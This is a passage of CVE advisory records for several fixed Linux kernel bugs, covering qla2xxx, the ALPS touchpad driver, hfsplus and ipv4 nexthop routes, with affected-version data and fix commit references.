"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.177",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: Revert \"scsi: qla2xxx: Perform lockless command completion in abort path\"\n\nThis reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9.\n\nThe commit being reverted added code to __qla2x00_abort_all_cmds() to\ncall sp-\u003edone() without holding a spinlock. But unlike the older code\nbelow it, this new code failed to check sp-\u003ecmd_type and just assumed\nTYPE_SRB, which results in a jump to an invalid pointer in target-mode\nwith TYPE_TGT_CMD:\n\nqla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success\n 0000000009f7a79b\nqla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h\n mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h.\nqla2xxx [0000:65:00.0]-d01e:8: -\u003e fwdump no buffer\nqla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event\n 0x8002 occurred\nqla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery -\n ha=0000000058183fda.\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPF: supervisor instruction fetch in kernel mode\nPF: error_code(0x0010) - not-present page\nPGD 0 P4D 0\nOops: 0010 [#1] SMP\nCPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1\nHardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023\nRIP: 0010:0x0\nCode: Unable to access opcode bytes at 0xffffffffffffffd6.\nRSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206\nRAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000\nRDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0\nRBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045\nR10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40\nR13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400\nFS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x4d/0x8b\n ? page_fault_oops+0x91/0x180\n ? trace_buffer_unlock_commit_regs+0x38/0x1a0\n ? exc_page_fault+0x391/0x5e0\n ? asm_exc_page_fault+0x22/0x30\n __qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst]\n qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst]\n qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst]\n qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst]\n qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst]\n kthread+0xa8/0xd0\n \u003c/TASK\u003e\n\nThen commit 4475afa2646d (\"scsi: qla2xxx: Complete command early within\nlock\") added the spinlock back, because not having the lock caused a\nrace and a crash. But qla2x00_abort_srb() in the switch below already\nchecks for qla2x00_chip_is_down() and handles it the same way, so the\ncode above the switch is now redundant and still buggy in target-mode.\nRemove it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:22.778Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b04b3733fff7e94566386b962e4795550fbdfd3d"
},
{
"url": "https://git.kernel.org/stable/c/50b097d92c99f718831b8b349722bc79f718ba1b"
},
{
"url": "https://git.kernel.org/stable/c/c5c37a821bd1708f26a9522b4a6f47b9f7a20003"
},
{
"url": "https://git.kernel.org/stable/c/e9e601b7df58ba0c667baf30263331df2c02ffe1"
},
{
"url": "https://git.kernel.org/stable/c/b10ebbfd59a535c8d22f4ede6e8389622ce98dc0"
},
{
"url": "https://git.kernel.org/stable/c/1c728951bc769b795d377852eae1abddad88635d"
},
{
"url": "https://git.kernel.org/stable/c/b57fbc88715b6d18f379463f48a15b560b087ffe"
}
],
"title": "scsi: Revert \"scsi: qla2xxx: Perform lockless command completion in abort path\"",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68818",
"datePublished": "2026-01-13T15:29:22.018Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:22.778Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68822 (GCVE-0-2025-68822)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
Input: alps - fix use-after-free bugs caused by dev3_register_work
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: alps - fix use-after-free bugs caused by dev3_register_work
The dev3_register_work delayed work item is initialized within
alps_reconnect() and scheduled upon receipt of the first bare
PS/2 packet from an external PS/2 device connected to the ALPS
touchpad. During device detachment, the original implementation
calls flush_workqueue() in psmouse_disconnect() to ensure
completion of dev3_register_work. However, the flush_workqueue()
in psmouse_disconnect() only blocks and waits for work items that
were already queued to the workqueue prior to its invocation. Any
work items submitted after flush_workqueue() is called are not
included in the set of tasks that the flush operation awaits.
This means that after flush_workqueue() has finished executing,
the dev3_register_work could still be scheduled. Although the
psmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),
the scheduling of dev3_register_work remains unaffected.
The race condition can occur as follows:
CPU 0 (cleanup path) | CPU 1 (delayed work)
psmouse_disconnect() |
psmouse_set_state() |
flush_workqueue() | alps_report_bare_ps2_packet()
alps_disconnect() | psmouse_queue_work()
kfree(priv); // FREE | alps_register_bare_ps2_mouse()
| priv = container_of(work...); // USE
| priv->dev3 // USE
Add disable_delayed_work_sync() in alps_disconnect() to ensure
that dev3_register_work is properly canceled and prevented from
executing after the alps_data structure has been deallocated.
This bug is identified by static analysis.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < ed8c61b89be0c45f029228b2913d5cf7b5cda1a7
(git)
Affected: 04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < a9c115e017b2c633d25bdfe6709dda6fc36f08c2 (git) Affected: 04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < bf40644ef8c8a288742fa45580897ed0e0289474 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/mouse/alps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ed8c61b89be0c45f029228b2913d5cf7b5cda1a7",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
},
{
"lessThan": "a9c115e017b2c633d25bdfe6709dda6fc36f08c2",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
},
{
"lessThan": "bf40644ef8c8a288742fa45580897ed0e0289474",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/mouse/alps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.0"
},
{
"lessThan": "4.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:24.703Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ed8c61b89be0c45f029228b2913d5cf7b5cda1a7"
},
{
"url": "https://git.kernel.org/stable/c/a9c115e017b2c633d25bdfe6709dda6fc36f08c2"
},
{
"url": "https://git.kernel.org/stable/c/bf40644ef8c8a288742fa45580897ed0e0289474"
}
],
"title": "Input: alps - fix use-after-free bugs caused by dev3_register_work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68822",
"datePublished": "2026-01-13T15:29:24.703Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-13T15:29:24.703Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68767 (GCVE-0-2025-68767)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
hfsplus: Verify inode mode when loading from disk
Summary
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: Verify inode mode when loading from disk
syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when
the S_IFMT bits of the 16bits "mode" field loaded from disk are corrupted.
According to [1], the permissions field was treated as reserved in Mac OS
8 and 9. According to [2], the reserved field was explicitly initialized
with 0, and that field must remain 0 as long as reserved. Therefore, when
the "mode" field is not 0 (i.e. no longer reserved), the file must be
S_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/
S_IFBLK/S_IFIFO/S_IFSOCK if dir == 0.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6f768724aabd5b321c5b8f15acdca11e4781cf32
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d92333c7a35856e419500e7eed72dac1afa404a5 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 001f44982587ad462b3002ee40c75e8df67d597d (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 05ec9af3cc430683c97f76027e1c55ac6fd25c59 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < edfb2e602b5ba5ca6bf31cbac20b366efb72b156 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 91f114bffa36ce56d0e1f60a0a44fc09baaefc79 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 005d4b0d33f6b4a23d382b7930f7a96b95b01f39 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6f768724aabd5b321c5b8f15acdca11e4781cf32",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d92333c7a35856e419500e7eed72dac1afa404a5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "001f44982587ad462b3002ee40c75e8df67d597d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "05ec9af3cc430683c97f76027e1c55ac6fd25c59",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "edfb2e602b5ba5ca6bf31cbac20b366efb72b156",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "91f114bffa36ce56d0e1f60a0a44fc09baaefc79",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "005d4b0d33f6b4a23d382b7930f7a96b95b01f39",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: Verify inode mode when loading from disk\n\nsyzbot is reporting that S_IFMT bits of inode-\u003ei_mode can become bogus when\nthe S_IFMT bits of the 16bits \"mode\" field loaded from disk are corrupted.\n\nAccording to [1], the permissions field was treated as reserved in Mac OS\n8 and 9. According to [2], the reserved field was explicitly initialized\nwith 0, and that field must remain 0 as long as reserved. Therefore, when\nthe \"mode\" field is not 0 (i.e. no longer reserved), the file must be\nS_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/\nS_IFBLK/S_IFIFO/S_IFSOCK if dir == 0."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:50.036Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6f768724aabd5b321c5b8f15acdca11e4781cf32"
},
{
"url": "https://git.kernel.org/stable/c/d92333c7a35856e419500e7eed72dac1afa404a5"
},
{
"url": "https://git.kernel.org/stable/c/001f44982587ad462b3002ee40c75e8df67d597d"
},
{
"url": "https://git.kernel.org/stable/c/05ec9af3cc430683c97f76027e1c55ac6fd25c59"
},
{
"url": "https://git.kernel.org/stable/c/edfb2e602b5ba5ca6bf31cbac20b366efb72b156"
},
{
"url": "https://git.kernel.org/stable/c/91f114bffa36ce56d0e1f60a0a44fc09baaefc79"
},
{
"url": "https://git.kernel.org/stable/c/005d4b0d33f6b4a23d382b7930f7a96b95b01f39"
}
],
"title": "hfsplus: Verify inode mode when loading from disk",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68767",
"datePublished": "2026-01-13T15:28:46.382Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-19T12:18:50.036Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71097 (GCVE-0-2025-71097)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ipv4: Fix reference count leak when using error routes with nexthop objects
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv4: Fix reference count leak when using error routes with nexthop objects
When a nexthop object is deleted, it is marked as dead and then
fib_table_flush() is called to flush all the routes that are using the
dead nexthop.
The current logic in fib_table_flush() is to only flush error routes
(e.g., blackhole) when it is called as part of network namespace
dismantle (i.e., with flush_all=true). Therefore, error routes are not
flushed when their nexthop object is deleted:
# ip link add name dummy1 up type dummy
# ip nexthop add id 1 dev dummy1
# ip route add 198.51.100.1/32 nhid 1
# ip route add blackhole 198.51.100.2/32 nhid 1
# ip nexthop del id 1
# ip route show
blackhole 198.51.100.2 nhid 1 dev dummy1
As such, they keep holding a reference on the nexthop object which in
turn holds a reference on the nexthop device, resulting in a reference
count leak:
# ip link del dev dummy1
[ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2
Fix by flushing error routes when their nexthop is marked as dead.
IPv6 does not suffer from this problem.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 5de7ad7e18356e39e8fbf7edd185a5faaf4f385a
(git)
Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 33ff5c207c873215e54e6176624ed57423cb7dea (git) Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 30386e090c49e803c0616a7147e43409c32a2b0e (git) Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 5979338c83012110ccd45cae6517591770bfe536 (git) Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < ee4183501ea556dca31f5ffd8690aa9fd25b609f (git) Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < e3fc381320d04e4a74311e576a86cac49a16fc43 (git) Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < ac782f4e3bfcde145b8a7f8af31d9422d94d172a (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/fib_trie.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5de7ad7e18356e39e8fbf7edd185a5faaf4f385a",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "33ff5c207c873215e54e6176624ed57423cb7dea",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "30386e090c49e803c0616a7147e43409c32a2b0e",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "5979338c83012110ccd45cae6517591770bfe536",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "ee4183501ea556dca31f5ffd8690aa9fd25b609f",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "e3fc381320d04e4a74311e576a86cac49a16fc43",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "ac782f4e3bfcde145b8a7f8af31d9422d94d172a",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/fib_trie.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:58.253Z",
